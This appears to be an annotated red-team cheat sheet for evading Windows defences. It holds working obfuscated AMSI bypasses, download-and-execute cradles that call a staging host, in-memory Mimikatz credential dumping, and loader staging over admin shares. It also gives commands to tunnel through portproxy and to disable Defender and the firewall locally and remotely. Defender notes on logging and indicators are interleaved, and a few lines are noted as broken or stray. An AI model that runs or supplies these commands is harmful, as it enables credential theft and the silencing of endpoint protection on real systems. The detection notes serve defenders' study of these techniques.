
evasion / win

MITRE ATT&CK Enterprise: TA0005 - Defense Evasion


amsi

# amsi evasion # local # 01
# https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html
# What it does: the -f format strings reassemble "System.Management.Automation.AmsiUtils" and
# "amsiInitFailed"; the non-public static field is then set to $true via reflection, so AMSI
# stops scanning this PowerShell session. The case-mangling / backtick / format-string
# obfuscation only defeats literal-string signatures.
# Defender notes: ScriptBlock logging (Event ID 4104) still records this text as typed, and
# Constrained Language Mode blocks the [Type] cast and .NET member calls the patch depends on.
sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

# amsi evasion # local # 02
# Same amsiInitFailed patch as #01, wrapped over several lines with heavier string
# concatenation; functionally identical, so the same logging/CLM notes apply.
S`eT-It`em ( 'V'+'aR' + 'IA' + (("{1}{0}"-f'1','blE:')+'q2') +
('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ;
(
Get-
varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"((
"{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f
'.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f
'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em') ) )."g`etf`iElD"(
( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f
'ile','a')) ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}"
-f'ubl','P')+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

# amsi evasion # rshell # 01
# Download-and-iex cradles over plaintext HTTP from a staging host; $ztarg_computer_ip is a
# placeholder defined elsewhere in the operator's environment.
# Defender notes: the iex + iwr / Net.WebClient.DownloadString pairing and outbound HTTP to a
# non-corporate host are the usual detection points for this pattern.
iex (iwr http://$ztarg_computer_ip/amsibypass.txt -UseBasicParsing)
iex ((New-Object Net.WebClient).DownloadString('http://'$ztarg_computer_ip'/PowerView.ps1'))

applocker

# Read-only: dumps the effective AppLocker rule collections (what is allowed/denied on this
# host) — reconnaissance of execution restrictions, no state change.
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

download

# lolbas mpcmdrun.exe
# Defender's own command-line tool used as a file-download primitive (LOLBAS). The platform
# version folder (4.18.2008.9-0) is installation-specific and will differ per host.
# Defender notes: MpCmdRun.exe invoked with a URL argument from a user-context process is
# worth alerting on.
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path>

# download fuzzed mimikatz
# "fuzzed" = a string-renamed build (Invoke-Dummy / -DumpEvenMoreDummy) to dodge name-based
# signatures; 10.1.3.40 is the page's lab staging host. Regardless of cmdlet names, the
# behaviour to monitor is credential dumping, typically process access to LSASS.
(New-Object Net.WebClient).DownloadString('http://10.1.3.40/mimi/mimikatz.ps1'); Invoke-Dummy  -DumpEvenMoreDummy)

# download mimikatz archive to disk
# Unlike the in-memory variants, this writes c:\temp\mimi.zip — a file artifact for AV and forensics.
$r=New-Object System.Net.WebClient;$r.DownloadFile('http://10.1.3.40/mimi/mimi.zip', 'c:\temp\mimi.zip')

# run mimikatz in memory
# Pulls the public Invoke-Mimikatz script straight from GitHub (TLS, but a well-known URL) and
# calls its credential dump; the raw.githubusercontent.com fetch from a workstation is itself an indicator.
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

dinvoke

# download dinvoke on a host
# Loader.exe (D/Invoke-based loader) is staged from $zlat_computer_ip (the operator's lateral
# host) into C:\Users\Public — a world-writable directory commonly used for drops and
# therefore a good path to watch for new executables.
iwr http://$zlat_computer_ip/Loader.exe -OutFile C:\Users\Public\Loader.exe

# upload dinvoke on a remote host
# Copies the loader over the C$ admin share (SMB); "echo F" answers xcopy's file/directory prompt.
# Defender notes: executable writes to \\host\C$\Users\Public are a lateral-movement indicator.
echo F | xcopy C:\Users\Public\Loader.exe \\$ztarg_computer_ip\C$\Users\Public\Loader.exe

# execute safekatz via dinvoke
# The loader fetches SafetyKatz.exe over HTTP; %Pwn% is a cmd-style variable assumed to hold
# the arguments passed through with -Args.
C:\Users\Public\Loader.exe -path http://$zlat_computer_ip/SafetyKatz.exe -Args %Pwn% exit

# execute safekatz via dinvoke, http callback proxied on localhost
# netsh portproxy on the target forwards 0.0.0.0:8080 -> $zlat_computer_ip:80 so the loader's
# download appears to originate from 127.0.0.1; the command is delivered via WinRS.
# Defender notes: portproxy rules persist in the registry (HKLM\SYSTEM\CurrentControlSet\Services\PortProxy)
# and are a well-known tunnelling indicator; remote shell (winrs) use is worth auditing too.
$null |winrs -r:$ztarg_computer_name "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=$zlat_computer_ip"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -Args %Pwn% exit

edr

# Invoke-EDRChecker: third-party script that enumerates installed AV/EDR products
# (e.g. processes, services, drivers, install directories). Read-only recon.
Invoke-EDRChecker

# crowdstrike falcon
# Service display-name check only; read-only.
Get-Service | Where-Object{$_.DisplayName -like "*falcon*"}

# palo cortex xdr
# "Traps" is the pre-rebrand name of Cortex XDR and cytool.exe is its local CLI.
# NOTE(review): how the CryptSvc registry lookup relates to Cortex is not clear from this page — confirm.
cd "C:\Program Files\Palo Alto Networks\Traps"
./cytool.exe
dir HKLM:\SYSTEM\CurrentControlSet\Services\CryptSvc

powershell

# powershell execution protection bypass
# ExecutionPolicy is not a security boundary (Microsoft's own position): -ep bypass only skips
# the script-signing check for this process and is plainly visible in command-line logging.
powershell -ep bypass

# powershell fullLanguage / Constrained language mode
# https://seyptoo.github.io/clm-applocker/
# __PSLockdownPolicy is the debug/test knob PowerShell reads to choose its language mode; it is
# not a supported enforcement mechanism (it lives in the machine environment and can be edited
# by an admin), so production CLM should come from AppLocker/WDAC policy instead.
# The three lines below read the current value, query it in the registry, then set it.
$Env:__PSLockdownPolicy
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v __PSLockdownPolicy
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v __PSLockdownPolicy /t REG_SZ /d ConstrainedLanguage /f
# Stray fragment: fDenyTSConnections is the RDP "deny connections" value under Terminal Server,
# unrelated to __PSLockdownPolicy — looks like a truncated paste from another note.
/v fDenyTSConnections /t REG_DWORD /d 1 /f
# Reports the current session's mode (FullLanguage / ConstrainedLanguage).
$ExecutionContext.SessionState.LanguageMode
# Not a valid statement as written (property followed by a bare word); kept for reference only.
$ExecutionContext.SessionState.LanguageMode ConstrainedLanguage

# https://github.com/OmerYa/Invisi-Shell
# bypasses all of Powershell security features (ScriptBlock logging, Module logging, Transcription, AMSI) by hooking .Net assemblies
# NOTE(review): per the project, the hook is a CLR profiler loaded through the COR_ENABLE_PROFILING /
# COR_PROFILER environment variables, with the "NonAdmin" .bat registering the profiler under HKCU.
# Those env vars on a powershell.exe process and the profiler DLL itself are the indicators — confirm
# against the current release.
RunWithRegistryNonAdmin.bat

windows-defender

# disable windows defender
# Requires local admin, and both settings are among those Tamper Protection locks (the change is
# refused when it is on). Changes are logged in Microsoft-Windows-Windows Defender/Operational:
# Event ID 5001 (real-time protection disabled) and 5007 (configuration changed).
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Set-MpPreference -DisableIOAVProtection $true

# disable windows defender remotely via pssession
# Same changes pushed over WinRM; the last line ships a locally defined function body
# (Invoke-Mimi) to the remote session.
# Defender notes: on the target this runs under wsmprovhost.exe, so PowerShell activity hosted by
# wsmprovhost.exe combined with the 5001/5007 events is a strong remote-tampering signal.
$sess = New-PSSession -ComputerName $ztarg_computer_fqdn
Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess

# set local proxy redirection
# Duplicate of the dinvoke-section portproxy line (target's 0.0.0.0:8080 -> $zlat_computer_ip:80).
# The rule persists in the registry (HKLM\SYSTEM\CurrentControlSet\Services\PortProxy) until removed
# and is a common tunnelling indicator.
$null | winrs -r:$ztarg_computer_name "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=$zlat_computer_ip"

windows-firewall

# windows firewall showing / disabling config
# First line turns the host firewall off for all profiles (admin required, very noisy: Windows
# Security flags the "firewall off" state and policy-change auditing records it). Second line is
# read-only and is the one to run first so the prior state is captured.
netsh advfirewall set allprofiles state off
netsh advfirewall show allprofiles

S3cur3Th1sSh1t